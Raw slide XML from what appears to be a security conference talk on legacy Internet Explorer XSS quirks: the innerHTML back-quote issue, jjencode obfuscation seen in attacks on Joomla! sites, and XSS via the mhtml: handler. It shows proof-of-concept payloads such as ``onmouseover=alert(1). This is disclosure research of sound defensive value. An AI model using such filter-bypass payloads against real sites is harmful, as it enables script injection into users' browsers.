                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>はバッククォートを</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>のように引用符として扱う</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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429000"/>
            <a:ext cx="6984776" cy="1323439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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;input type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /&gt;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JavaScript back-quotes issue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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>バッククォート問題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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>Quotation mark (") will be stripped from the attribute value when using innerHTML property in case it doesn't contain space.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>を参照したときに属性値にスペースがなければ引用符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>は削除される</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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56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206567"/>
            <a:ext cx="7920880" cy="2246769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&lt;div id="x"&gt;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&lt;input type="text" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;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&lt;/div&gt;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alert( $("x").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innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> );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7345" y="4365104"/>
            <a:ext cx="3305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JavaScript back-quotes issue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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>バッククォート問題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556792"/>
            <a:ext cx="7920880" cy="3539430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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> id="div1"&gt;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&lt;input type="text" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>``</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" &gt;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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="28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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> id="div2"&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="28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&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("div2").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innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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   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document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("div1").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innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="28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&lt;/script&gt;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301208"/>
            <a:ext cx="7920880" cy="954107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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;DIV id=div2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    &lt;INPUT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onmouseover=alert(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> type=text&gt;&lt;/DIV&gt;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JavaScript back-quotes issue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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>バッククォート問題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2852936"/>
            <a:ext cx="7787208" cy="1512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kumimoji="1" lang="en-US" altLang="ja-JP" sz="9600" smtClean="0"/>
              <a:t>DEMO</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="9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JavaScript back-quotes issue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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>バッククォート問題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824536"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>Published : Apr 2007 in Japan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2007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月に日本で公開</a:t>
            </a:r>
            <a:endParaRPr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Affected : IE6 / IE7 / IE8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>Reported : Nov 2007 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0"/>
              <a:t>as IE8 beta feedback</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE8beta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>のフィードバックとして報告</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>"keep this behavior for backward compatibility", MS said.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>「後方互換性のためにこの動作を残す」</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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59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Obfuscated JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>難読化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill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jjencode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t> is used for actual attacking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>
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jjencode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>で難読化されたコードが実際に攻撃に利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Injected malicious JS code obfuscated by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>jjencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>some Italian sites using </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>Joomla</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>イタリアの複数の</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Joomla</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用サイトにて悪意のある難読化コードが挿入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty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479715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60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551723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61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XSS with mhtml handler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mhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ハンドラによる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS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6"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>At one time, IE had assumed and handled any contents as MHTML by using "mhtml" handler.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>かつて</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>は、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ハンドラを経由するとあらゆるコンテンツを</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>であるとして取り扱っていた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XSS with mhtml handler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mhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ハンドラによる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS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6"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>MHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0"/>
              <a:t> - Web archive format defined RFC2557</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:b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63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2204864"/>
            <a:ext cx="8280920" cy="4154984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FFFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>From:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hasegawa@utf-8.jp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> someone@example.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Subject:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MIME-Version:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF99"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Type:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> text/html; charset=us-ascii</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;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&lt;body&gt;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&lt;h1&gt;Hello&lt;/h1&gt;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&lt;/body&gt;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&lt;/html&gt;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5805264"/>
            <a:ext cx="30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*.eml or *.mht</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2800" b="1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XSS with mhtml handler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mhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ハンドラによる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS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484784"/>
            <a:ext cx="7272808" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DAE7F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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0"/>
              <a:t>:http://example.com/test.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="24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2204864"/>
            <a:ext cx="7272808" cy="4154984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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;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&lt;div&gt;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Subject: test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Content-Type: text/html; charset=us-ascii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Content-Transfer-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
              <a:solidFill>
